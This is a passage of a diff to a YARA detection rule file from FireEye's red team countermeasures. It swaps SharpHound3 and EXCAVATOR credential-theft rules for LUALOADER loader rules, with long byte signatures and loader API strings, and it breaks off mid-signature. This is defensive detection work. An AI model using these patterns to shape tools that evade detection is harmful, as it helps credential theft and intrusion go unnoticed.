= "LdapBuilder" - $init = { 28 [2] 00 0A 0A 72 [2] 00 70 1? ?? 28 [2] 00 0A 72 [2] 00 70 1? ?? 28 [2] 00 0A 28 [2] 00 0A 0B 1F 2D } - $msil = /\x00_Cor(Exe|Dll)Main\x00/ + $typelibguid0 = "17589ea6-fcc9-44bb-92ad-d5b3eea6af03" ascii nocase wide condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and all of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -rule FIREEYE_RT_Hacktool_MSIL_Sharphound_3 : FILE +rule FIREEYE_RT_APT_Loader_MSIL_LUALOADER_1 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project." + description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "456b3208-1e8d-5eb7-81ee-39f1c886c5a7" - date = "2020-12-09" - modified = "2020-12-09" + id = "970a869e-bd69-5609-bb8d-77bfa78b0630" + date = "2020-12-18" + modified = "2020-12-18" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PUPPYHOUND/production/yara/HackTool_MSIL_SharpHound_3.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/LUALOADER/production/yara/APT_Loader_MSIL_LUALOADER_1.yar#L4-L17" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "eeedc09570324767a3de8205f66a5295" - logic_hash = "baeea6cae42c755ee389378229b2b206c82f60f75a5ce5f9cfa06871fc9507d1" + logic_hash = "2d73d434ac39ebde990aca817a54208cd04bfbce33f1bcadcf48a50d9389658c" score = 75 - quality = 73 + quality = 75 tags = "FILE" - rev = 4 strings: - $typelibguid1 = "A517A8DE-5834-411D-ABDA-2D0E1766539C" ascii nocase wide + $sb1 = { 1? 72 [4] 14 D0 [2] 00 02 28 [2] 00 0A 1? 8D [2] 00 01 13 ?? 11 ?? 1? 1? 14 28 [2] 00 0A A2 11 ?? 1? 1? 14 28 [2] 00 0A A2 11 ?? 28 [2] 00 0A 28 [2] 00 0A 80 [2] 00 04 7E [2] 00 04 7B [2] 00 0A 7E [2] 00 04 11 ?? 11 ?? 6F [2] 00 0A 6F [2] 00 0A } + $ss1 = "\x3bN\x00e\x00o\x00.\x00I\x00r\x00o\x00n\x00L\x00u\x00a\x00.\x00L\x00u\x00a\x00C\x00o\x00m\x00p\x00i\x00l\x00e\x00O\x00p\x00t\x00i\x00o\x00n\x00s\x00" + $ss2 = "\x19C\x00o\x00m\x00p\x00i\x00l\x00e\x00C\x00h\x00u\x00n\x00k\x00" + $ss3 = "\x0fd\x00o\x00c\x00h\x00u\x00n\x00k\x00" + $ss4 = /.Reflection.Assembly:Load\(\w{1,64}\);?\s{0,245}\w{1,64}\.EntryPoint:Invoke\(nil/ wide + $ss5 = "1F 8B 08 00 00 00 00 00" wide condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and $typelibguid1 + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and all of them } -rule FIREEYE_RT_Credtheft_Win_EXCAVATOR_1 : FILE +rule FIREEYE_RT_APT_Loader_MSIL_LUALOADER_2 : FILE { meta: - description = "This rule looks for the binary signature of the 'Inject' method found in the main Excavator PE." + description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "7cabc230-e55b-5096-996a-b6a8c9693bdc" - date = "2020-12-09" - modified = "2020-12-09" + id = "f2826dbb-f0a4-5361-94d1-8509c60c4131" + date = "2020-12-18" + modified = "2020-12-18" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/EXCAVATOR/production/yara/CredTheft_Win_EXCAVATOR_1.yar#L4-L18" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/LUALOADER/production/yara/APT_Loader_MSIL_LUALOADER_2.yar#L4-L19" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "f7d9961463b5110a3d70ee2e97842ed3" - logic_hash = "bf4b776f34a1a9aa5438504f63a63ef452a747363de3b70cec52145d777055bd" + logic_hash = "700927768669eda6976071306e991bfaae136279f4265980521597c699fbed88" score = 75 quality = 75 tags = "FILE" - rev = 4 strings: - $bytes1 = { 48 89 74 24 10 48 89 7C 24 18 4C 89 74 24 20 55 48 8D 6C 24 E0 48 81 EC 20 01 00 00 48 8B 05 75 BF 01 00 48 33 C4 48 89 45 10 0F 57 C0 45 33 F6 8B F1 4C 89 74 24 60 48 8D 0D 12 A1 01 00 4C 89 74 24 68 0F 11 45 A0 41 8B FE 4C 89 74 24 70 0F 11 45 B0 0F 11 45 C0 0F 11 45 D0 0F 11 45 E0 0F 11 45 F0 0F 11 45 00 FF 15 CB 1F 01 00 48 85 C0 75 1B FF 15 80 1F 01 00 8B D0 48 8D 0D DF A0 01 00 E8 1A FF FF FF 33 C0 E9 B4 02 00 00 48 8D 15 D4 A0 01 00 48 89 9C 24 30 01 00 00 48 8B C8 FF 15 4B 1F 01 00 48 8B D8 48 85 C0 75 19 FF 15 45 1F 01 00 8B D0 48 8D 0D A4 A0 01 00 E8 DF FE FF FF E9 71 02 00 00 48 8B 4C 24 60 48 8D 44 24 60 45 33 C9 48 89 44 24 20 45 33 C0 BA 00 00 00 02 FF D3 85 C0 75 45 66 66 0F 1F 84 00 00 00 00 00 48 8B 4C 24 60 FF 15 4D 1F 01 00 3B C6 74 22 48 8B 4C 24 60 48 8D 44 24 60 45 33 C9 48 89 44 24 20 45 33 C0 BA 00 00 00 02 FF D3 85 C0 74 D1 EB 0A 48 8B 44 24 60 48 89 44 24 70 66 0F 6F 15 6D A0 01 00 48 8D 05 A6 C8 01 00 B9 C8 05 00 00 90 F3 0F 6F 40 F0 48 8D 40 40 66 0F 6F CA 66 0F EF C8 F3 0F 7F 48 B0 66 0F 6F CA F3 0F 6F 40 C0 66 0F EF C8 F3 0F 7F 48 C0 66 0F 6F CA F3 0F 6F 40 D0 66 0F EF C8 F3 0F 7F 48 D0 F3 0F 6F 40 E0 66 0F EF C2 F3 0F 7F 40 E0 48 83 E9 01 75 B2 FF 15 CC 1E 01 00 4C 8D 44 24 78 BA 0A 00 00 00 48 8B C8 FF 15 01 1E 01 00 85 C0 0F 84 66 01 00 00 48 8B 4C 24 78 48 8D 45 80 41 B9 02 00 00 00 48 89 44 24 28 45 33 C0 C7 44 24 20 02 00 00 00 41 8D 51 09 FF 15 D8 1D 01 00 85 C0 0F 84 35 01 00 00 45 33 C0 4C 8D 4C 24 68 33 C9 41 8D 50 01 FF 15 5C 1E 01 00 FF 15 06 1E 01 00 4C 8B 44 24 68 33 D2 48 8B C8 FF 15 DE 1D 01 00 48 8B F8 48 85 C0 0F 84 FF 00 00 00 45 33 C0 4C 8D 4C 24 68 48 8B C8 41 8D 50 01 FF 15 25 1E 01 00 85 C0 0F 84 E2 00 00 00 4C 89 74 24 30 4C 8D 4C 24 70 4C 89 74 24 28 33 D2 41 B8 00 00 02 00 48 C7 44 24 20 08 00 00 00 48 8B CF FF 15 6C 1D 01 00 85 C0 0F 84 B1 00 00 00 48 8B 4D 80 48 8D 45 88 48 89 44 24 50 4C 8D 05 58 39 03 00 48 8D 45 A0 48 89 7D 08 48 89 44 24 48 45 33 C9 4C 89 74 24 40 33 D2 4C 89 74 24 38 C7 44 24 30 04 00 08 00 44 89 74 24 28 4C 89 74 24 20 FF 15 0C 1D 01 00 85 C0 74 65 48 8B 4C 24 70 8B 5D 98 FF 15 1A 1D 01 00 48 8B 4D 88 FF 15 10 1D 01 00 48 8B 4D 90 FF 15 06 1D 01 00 44 8B C3 33 D2 B9 3A 04 00 00 FF 15 4E 1D 01 00 48 8B D8 48 85 C0 74 2B 48 8B C8 E8 4E 06 00 00 48 85 C0 74 1E BA FF FF FF FF 48 8B C8 FF 15 3B 1D 01 00 48 8B CB FF 15 CA 1C 01 00 B8 01 00 00 00 EB 24 FF 15 DD 1C 01 00 8B D0 48 8D 0D 58 9E 01 00 E8 77 FC FF FF 48 85 FF 74 09 48 8B CF FF 15 A9 1C 01 00 33 C0 48 8B 9C 24 30 01 00 00 48 8B 4D 10 48 33 CC E8 03 07 00 00 4C 8D 9C 24 20 01 00 00 49 8B 73 18 49 8B 7B 20 4D 8B 73 28 49 8B E3 5D C3 } - $bytes2 = { 48 89 74 24 10 48 89 7C 24 18 4C 89 74 24 20 55 48 8D 6C 24 E0 48 81 EC 2? ?1 ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 33 C4 48 89 45 10 0F 57 C0 45 33 F6 8B F1 4C 89 74 24 60 48 ?? ?? ?? ?? ?? ?? 4C 89 74 24 68 0F 11 45 A0 41 8B FE 4C 89 74 24 70 0F 11 45 B0 0F 11 45 C0 0F 11 45 D0 0F 11 45 E0 0F 11 45 F0 0F 11 45 ?? FF ?? ?? ?? ?? ?? 48 85 C0 75 ?? FF ?? ?? ?? ?? ?? 8B D0 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 89 9C 24 3? ?1 ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? FF ?? ?? ?? ?? ?? 8B D0 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 4C 24 60 48 8D 44 24 60 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 75 ?? 66 66 0F 1F 84 ?? ?? ?? ?? ?? 48 8B 4C 24 60 FF ?? ?? ?? ?? ?? 3B C6 74 ?? 48 8B 4C 24 60 48 8D 44 24 60 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 74 ?? EB ?? 48 8B 44 24 60 48 89 44 24 70 66 0F 6F 15 6D A? ?1 ?? 48 ?? ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 90 F3 0F 6F 40 F0 48 8D 40 40 66 0F 6F CA 66 0F EF C8 F3 0F 7F 48 B0 66 0F 6F CA F3 0F 6F 40 C0 66 0F EF C8 F3 0F 7F 48 C0 66 0F 6F CA F3 0F 6F 40 D0 66 0F EF C8 F3 0F 7F 48 D0 F3 0F 6F 40 E0 66 0F EF C2 F3 0F 7F 40 E0 48 83 E9 01 75 ?? FF ?? ?? ?? ?? ?? 4C 8D 44 24 78 BA 0A ?? ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4C 24 78 48 8D 45 80 41 B9 02 ?? ?? ?? 48 89 44 24 28 45 33 C0 C7 44 24 2? ?2 ?? ?? ?? 41 8D 51 09 FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 45 33 C0 4C 8D 4C 24 68 33 C9 41 8D 5? ?1 FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 4C 8B 44 24 68 33 D2 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B F8 48 85 C0 0F 84 ?? ?? ?? ?? 45 33 C0 4C 8D 4C 24 68 48 8B C8 41 8D 5? ?1 FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 4C 89 74 24 30 4C 8D 4C 24 70 4C 89 74 24 28 33 D2 41 ?? ?? ?? ?? ?? 48 C7 44 24 2? ?8 ?? ?? ?? 48 8B CF FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4D 80 48 8D 45 88 48 89 44 24 50 4C ?? ?? ?? ?? ?? ?? 48 8D 45 A0 48 89 7D 08 48 89 44 24 48 45 33 C9 4C 89 74 24 40 33 D2 4C 89 74 24 38 C7 ?? ?? ?? ?? ?? ?? ?? 44 89 74 24 28 4C 89 74 24 20 FF ?? ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 70 8B 5D 98 FF ?? ?? ?? ?? ?? 48 8B 4D 88 FF ?? ?? ?? ?? ?? 48 8B 4D 90 FF ?? ?? ?? ?? ?? 44 8B C3 33 D2 B9 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B D8 48 85 C0 74 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 85 C0 74 ?? BA ?? ?? ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? B8 01 ?? ?? ?? EB ?? FF ?? ?? ?? ?? ?? 8B D0 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 FF 74 ?? 48 8B CF FF ?? ?? ?? ?? ?? 33 C0 48 8B 9C 24 3? ?1 ?? ?? 48 8B 4D 10 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 2? ?1 ?? ?? 49 8B 73 18 49 8B 7B 20 4D 8B 73 28 49 8B E3 5D C3 } - $bytes3 = { 48 89 74 24 10 48 89 7C 24 18 4C 89 74 24 20 55 48 8D 6C 24 E0 48 81 EC 2? ?1 ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 33 C4 48 89 45 10 0F 57 C0 45 33 F6 8B F1 4C 89 74 24 60 48 ?? ?? ?? ?? ?? ?? 4C 89 74 24 68 0F 11 45 A0 41 8B FE 4C 89 74 24 70 0F 11 45 B0 0F 11 45 C0 0F 11 45 D0 0F 11 45 E0 0F 11 45 F0 0F 11 45 ?? FF ?? ?? ?? ?? ?? 48 85 C0 75 ?? FF ?? ?? ?? ?? ?? 8B D0 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 89 9C 24 3? ?1 ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? FF ?? ?? ?? ?? ?? 8B D0 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 4C 24 60 48 8D 44 24 60 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 75 ?? 66 66 0F 1F 84 ?? ?? ?? ?? ?? 48 8B 4C 24 60 FF ?? ?? ?? ?? ?? 3B C6 74 ?? 48 8B 4C 24 60 48 8D 44 24 60 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 74 ?? EB ?? 48 8B 44 24 60 48 89 44 24 70 66 0F 6F 15 6D A? ?1 ?? 48 ?? ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 90 F3 0F 6F 40 F0 48 8D 40 40 66 0F 6F CA 66 0F EF C8 F3 0F 7F 48 B0 66 0F 6F CA F3 0F 6F 40 C0 66 0F EF C8 F3 0F 7F 48 C0 66 0F 6F CA F3 0F 6F 40 D0 66 0F EF C8 F3 0F 7F 48 D0 F3 0F 6F 40 E0 66 0F EF C2 F3 0F 7F 40 E0 48 83 E9 01 75 ?? FF ?? ?? ?? ?? ?? 4C 8D 44 24 78 BA 0A ?? ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4C 24 78 48 8D 45 80 41 B9 02 ?? ?? ?? 48 89 44 24 28 45 33 C0 C7 44 24 2? ?2 ?? ?? ?? 41 8D 51 09 FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 45 33 C0 4C 8D 4C 24 68 33 C9 41 8D 5? ?1 FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 4C 8B 44 24 68 33 D2 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B F8 48 85 C0 0F 84 ?? ?? ?? ?? 45 33 C0 4C 8D 4C 24 68 48 8B C8 41 8D 5? ?1 FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 4C 89 74 24 30 4C 8D 4C 24 70 4C 89 74 24 28 33 D2 41 ?? ?? ?? ?? ?? 48 C7 44 24 2? ?8 ?? ?? ?? 48 8B CF FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4D 80 48 8D 45 88 48 89 44 24 50 4C ?? ?? ?? ?? ?? ?? 48 8D 45 A0 48 89 7D 08 48 89 44 24 48 45 33 C9 4C 89 74 24 40 33 D2 4C 89 74 24 38 C7 ?? ?? ?? ?? ?? ?? ?? 44 89 74 24 28 4C 89 74 24 20 FF ?? ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 70 8B 5D 98 FF ?? ?? ?? ?? ?? 48 8B 4D 88 FF ?? ?? ?? ?? ?? 48 8B 4D 90 FF ?? ?? ?? ?? ?? 44 8B C3 33 D2 B9 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B D8 48 85 C0 74 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 85 C0 74 ?? BA ?? ?? ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? B8 01 ?? ?? ?? EB ?? FF ?? ?? ?? ?? ?? 8B D0 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 FF 74 ?? 48 8B CF FF ?? ?? ?? ?? ?? 33 C0 48 8B 9C 24 3? ?1 ?? ?? 48 8B 4D 10 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 2? ?1 ?? ?? 49 8B 73 18 49 8B 7B 20 4D 8B 73 28 49 8B E3 5D C3 } - $bytes4 = { 48 89 74 24 ?? 48 89 7C 24 ?? 4C 89 74 24 ?? 55 48 8D 6C 24 ?? 48 81 EC 20 01 00 00 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 45 ?? 0F 57 C0 45 33 F6 8B F1 4C 89 74 24 ?? 48 8D 0D ?? ?? ?? ?? 4C 89 74 24 ?? 0F 11 45 ?? 41 8B FE 4C 89 74 24 ?? 0F 11 45 ?? 0F 11 45 ?? 0F 11 45 ?? 0F 11 45 ?? 0F 11 45 ?? 0F 11 45 ?? FF 15 ?? ?? ?? ?? 48 85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B D0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B D0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8D 44 24 ?? 45 33 C9 48 89 44 24 ?? 45 33 C0 BA 00 00 00 02 FF D3 85 C0 75 ?? 66 66 0F 1F 84 00 ?? ?? 00 00 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 3B C6 74 ?? 48 8B 4C 24 ?? 48 8D 44 24 ?? 45 33 C9 48 89 44 24 ?? 45 33 C0 BA 00 00 00 02 FF D3 85 C0 74 ?? EB ?? 48 8B 44 24 ?? 48 89 44 24 ?? 66 0F 6F 15 ?? ?? 01 00 48 8D 05 ?? ?? ?? ?? B9 C8 05 00 00 90 F3 0F 6F 40 ?? 48 8D 40 ?? 66 0F 6F CA 66 0F EF C8 F3 0F 7F 48 ?? 66 0F 6F CA F3 0F 6F 40 ?? 66 0F EF C8 F3 0F 7F 48 ?? 66 0F 6F CA F3 0F 6F 40 ?? 66 0F EF C8 F3 0F 7F 48 ?? F3 0F 6F 40 ?? 66 0F EF C2 F3 0F 7F 40 ?? 48 83 E9 01 75 ?? FF 15 ?? ?? ?? ?? 4C 8D 44 24 ?? BA 0A 00 00 00 48 8B C8 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8D 45 ?? 41 B9 02 00 00 00 48 89 44 24 ?? 45 33 C0 C7 44 24 ?? 02 00 00 00 41 8D 51 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 45 33 C0 4C 8D 4C 24 ?? 33 C9 41 8D 50 ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 4C 8B 44 24 ?? 33 D2 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B F8 48 85 C0 0F 84 ?? ?? ?? ?? 45 33 C0 4C 8D 4C 24 ?? 48 8B C8 41 8D 50 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 4C 89 74 24 ?? 4C 8D 4C 24 ?? 4C 89 74 24 ?? 33 D2 41 B8 00 00 02 00 48 C7 44 24 ?? 08 00 00 00 48 8B CF FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4D ?? 48 8D 45 ?? 48 89 44 24 ?? 4C 8D 05 ?? ?? ?? ?? 48 8D 45 ?? 48 89 7D ?? 48 89 44 24 ?? 45 33 C9 4C 89 74 24 ?? 33 D2 4C 89 74 24 ?? C7 44 24 ?? 04 00 08 00 44 89 74 24 ?? 4C 89 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 ?? 8B 5D ?? FF 15 ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 44 8B C3 33 D2 B9 3A 04 00 00 FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 74 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 85 C0 74 ?? BA FF FF FF FF 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? FF 15 ?? ?? ?? ?? 8B D0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 FF 74 ?? 48 8B CF FF 15 ?? ?? ?? ?? 33 C0 48 8B 9C 24 ?? ?? ?? ?? 48 8B 4D ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 73 ?? 49 8B 7B ?? 4D 8B 73 ?? 49 8B E3 5D C3 } + $ss1 = "\x3bN\x00e\x00o\x00.\x00I\x00r\x00o\x00n\x00L\x00u\x00a\x00.\x00L\x00u\x00a\x00C\x00o\x00m\x00p\x00i\x00l\x00e\x00O\x00p\x00t\x00i\x00o\x00n\x00s\x00" + $ss2 = "\x19C\x00o\x00m\x00p\x00i\x00l\x00e\x00C\x00h\x00u\x00n\x00k\x00" + $ss3 = "\x0fd\x00o\x00c\x00h\x00u\x00n\x00k\x00" + $ss4 = /.Reflection.Assembly:Load\(\w{1,64}\);?\s{0,245}\w{1,64}\.EntryPoint:Invoke\(nil/ wide + $ss5 = "1F 8B 08 00 00 00 00 00" wide + $ss6 = "\x00LoadLibrary\x00" + $ss7 = "\x00GetProcAddress\x00" + $ss8 = "\x00VirtualProtect\x00" condition: - uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550 and any of ($bytes*) + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and all of them } -rule FIREEYE_RT_Credtheft_Win_EXCAVATOR_2 : FILE +rule FIREEYE_RT_APT_Hacktool_MSIL_LUALOADER_1 : FILE { meta: - description = "This rule looks for the binary signature of the routine that calls PssFreeSnapshot found in the Excavator-Reflector DLL." + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'lualoader' project." author = "FireEye" - id = "89037b9a-78b0-5a8c-bb60-3d54842d81e1" + id = "e8480cf8-1852-5572-8e92-c0ae676b7507" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/EXCAVATOR/production/yara/CredTheft_Win_EXCAVATOR_2.yar#L4-L18" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/LUALOADER/production/yara/APT_HackTool_MSIL_LUALOADER_1.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "6a9a114928554c26675884eeb40cc01b" - logic_hash = "408e8862f0c470105648fdba00dc5531ffcd739fa544f89acb70f0fa1b105c03" + hash = "dd8805d0e470e59b829d98397507d8c2" + logic_hash = "7e9f9836ec91aa66c8779588cfceff718487f0cb5048d17538c947aba687a4cf" score = 75 - quality = 75 + quality = 73 tags = "FILE" rev = 3 strings: - $bytes1 = { 4C 89 74 24 20 55 48 8D AC 24 60 FF FF FF 48 81 EC A0 01 00 00 48 8B 05 4C 4A 01 00 48 33 C4 48 89 85 90 00 00 00 BA 50 00 00 00 C7 05 CB 65 01 00 43 00 3A 00 66 89 15 EC 65 01 00 4C 8D 44 24 68 48 8D 15 D8 68 01 00 C7 05 B2 65 01 00 5C 00 57 00 33 C9 C7 05 AA 65 01 00 69 00 6E 00 C7 05 A4 65 01 00 64 00 6F 00 C7 05 9E 65 01 00 77 00 73 00 C7 05 98 65 01 00 5C 00 4D 00 C7 05 92 65 01 00 45 00 4D 00 C7 05 8C 65 01 00 4F 00 52 00 C7 05 86 65 01 00 59 00 2E 00 C7 05 80 65 01 00 44 00 4D 00 C7 05 72 68 01 00 53 00 65 00 C7 05 6C 68 01 00 44 00 65 00 C7 05 66 68 01 00 42 00 75 00 C7 05 60 68 01 00 47 00 50 00 C7 05 5A 68 01 00 72 00 69 00 C7 05 54 68 01 00 56 00 69 00 C7 05 4E 68 01 00 4C 00 45 00 C7 05 48 68 01 00 67 00 65 00 C7 05 12 67 01 00 6C 73 61 73 C7 05 0C 67 01 00 73 2E 65 78 C6 05 09 67 01 00 65 FF 15 63 B9 00 00 45 33 F6 85 C0 74 66 48 8B 44 24 68 48 89 44 24 74 C7 44 24 70 01 00 00 00 C7 44 24 7C 02 00 00 00 FF 15 A4 B9 00 00 48 8B C8 4C 8D 44 24 48 41 8D 56 20 FF 15 1A B9 00 00 85 C0 74 30 48 8B 4C 24 48 4C 8D 44 24 70 4C 89 74 24 28 45 33 C9 33 D2 4C 89 74 24 20 FF 15 EF B8 00 00 FF 15 11 B9 00 00 48 8B 4C 24 48 FF 15 16 B9 00 00 48 89 9C 24 B0 01 00 00 48 8D 0D BF 2E 01 00 48 89 B4 24 B8 01 00 00 4C 89 74 24 40 FF 15 1C B9 00 00 48 85 C0 0F 84 B0 00 00 00 48 8D 15 AC 2E 01 00 48 8B C8 FF 15 1B B9 00 00 48 8B D8 48 85 C0 0F 84 94 00 00 00 33 D2 48 8D 4D 80 41 B8 04 01 00 00 E8 06 15 00 00 48 8B 4C 24 40 48 8D 44 24 40 45 33 C9 48 89 44 24 20 45 33 C0 BA 00 00 00 02 FF D3 85 C0 75 63 66 0F 1F 44 00 00 48 8B 4C 24 40 4C 8D 45 80 41 B9 04 01 00 00 33 D2 FF 15 89 B8 00 00 48 8D 15 F2 65 01 00 48 8D 4D 80 E8 49 0F 00 00 48 85 C0 75 38 33 D2 48 8D 4D 80 41 B8 04 01 00 00 E8 A3 14 00 00 48 8B 4C 24 40 48 8D 44 24 40 45 33 C9 48 89 44 24 20 45 33 C0 BA 00 00 00 02 FF D3 85 C0 74 A3 33 C0 E9 F5 00 00 00 48 8B 5C 24 40 48 8B CB FF 15 5E B8 00 00 8B F0 48 85 DB 74 E4 85 C0 74 E0 4C 8D 4C 24 50 48 89 BC 24 C0 01 00 00 BA FD 03 00 AC 41 B8 1F 00 10 00 48 8B CB FF 15 12 B8 00 00 85 C0 0F 85 A0 00 00 00 48 8D 05 43 FD FF FF 4C 89 74 24 30 C7 44 24 28 80 00 00 00 48 8D 0D 3F 63 01 00 45 33 C9 48 89 44 24 58 45 33 C0 C7 44 24 20 01 00 00 00 BA 00 00 00 10 4C 89 74 24 60 FF 15 E4 B7 00 00 48 8B F8 48 83 F8 FF 74 59 48 8B 4C 24 50 48 8D 44 24 58 48 89 44 24 30 41 B9 02 00 00 00 4C 89 74 24 28 4C 8B C7 8B D6 4C 89 74 24 20 FF 15 B1 B9 00 00 48 8B CB FF 15 78 B7 00 00 48 8B CF FF 15 6F B7 00 00 FF 15 B1 B7 00 00 48 8B 54 24 50 48 8B C8 FF 15 53 B7 00 00 33 C9 FF 15 63 B7 00 00 CC 48 8B CB FF 15 49 B7 00 00 48 8B BC 24 C0 01 00 00 33 C0 48 8B B4 24 B8 01 00 00 48 8B 9C 24 B0 01 00 00 48 8B 8D 90 00 00 00 48 33 CC E8 28 00 00 00 4C 8B B4 24 C8 01 00 00 48 81 C4 A0 01 00 00 5D C3 } - $bytes2 = { 4C 89 74 24 20 55 48 8D AC 24 60 FF FF FF 48 81 EC A? ?1 ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 33 C4 48 89 85 9? ?? ?? ?0 BA ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? 66 89 ?? ?? ?? ?? ?? 4C 8D 44 24 68 48 ?? ?? ?? ?? ?? ?? 